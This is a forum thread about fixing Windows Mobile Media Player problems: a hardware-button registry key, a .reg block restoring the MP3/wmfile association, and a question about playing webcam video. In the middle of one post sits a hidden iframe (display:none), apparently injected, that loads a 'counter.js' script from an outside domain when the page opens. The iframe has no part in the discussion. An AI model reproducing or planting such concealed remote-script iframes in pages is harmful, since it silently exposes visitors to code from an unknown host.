+ Reply to Thread

My Media Player isn't working correctly, what do I do?

Dead Media Player

Solution:

Use a registry editor, goto \HKLM\SOFTWARE\Microsoft\Shell\Keys. This is where you have hardware button mapping. You should only have 2 keys there (Mine is named 40C1 and 40C2).

If you have the window media issue, you should find another key there, which was put by some other softwares installation, for e.g. Fonix voice central. You need to delete it.

OR, this may also work....

Using File Explorer look in the Windows directory and find welcome.exe, run it and go through all the stages - thats it.

Lost Association of Media Player to .MP3 files

I had installed Divx and choosed this one to open mp3 files. When I uninstalled Divx I could open media player in order to play mp3 files directly from the mp3 files but I do not see the media player icon beside mp3 files anymore. Is there any way to solve it and see again Media Player's icon beside mp3 files??

Solution:

basically your reg entry for file association of MP3 is screwed up. You can use Resco File Explorer to fix the association by trying to open a MP3 file with Resco, and when it can't find Divx program, File Explorer will ask you what program to open with, and you can set it to always open with WMP.

You can also use a reg editor to fix the broken key. The key is WMFILE under HKEY_CLASSES_ROOT. Below is the settings for it....

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\wmfile]
    "EditFlags"=dword:00010000
    @="Windows Media File"

[HKEY_CLASSES_ROOT\wmfile\Shell]

[HKEY_CLASSES_ROOT\wmfile\Shell\Open]

[HKEY_CLASSES_ROOT\wmfile\Shell\Open\Command]
    @="\\Windows\\player.exe %1"

[HKEY_CLASSES_ROOT\wmfile\DefaultIcon]
    @="\\Windows\\player.exe,-2001"

[/siz]<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    NewsGuy
    pdaPhoneHome

REGISTER and join in the Discussions!!!

There should be three keys under \HKLM\SOFTWARE\Microsoft\Shell\Keys.

The third one 40C3 is used for mapping the third hardware button (Default = Contacts).

i700 media player

Can I play video files like wmv, mpeg or avi. I try a .wmv file and only got the audio. Is something wrong?

Thanks

What a weird thread on which to post that question.

My guess is you need a different video codec. Where did you get the wmv?

i700

I'm new to this, but the .wmv file is a compress video file from my webcam, compress for Email.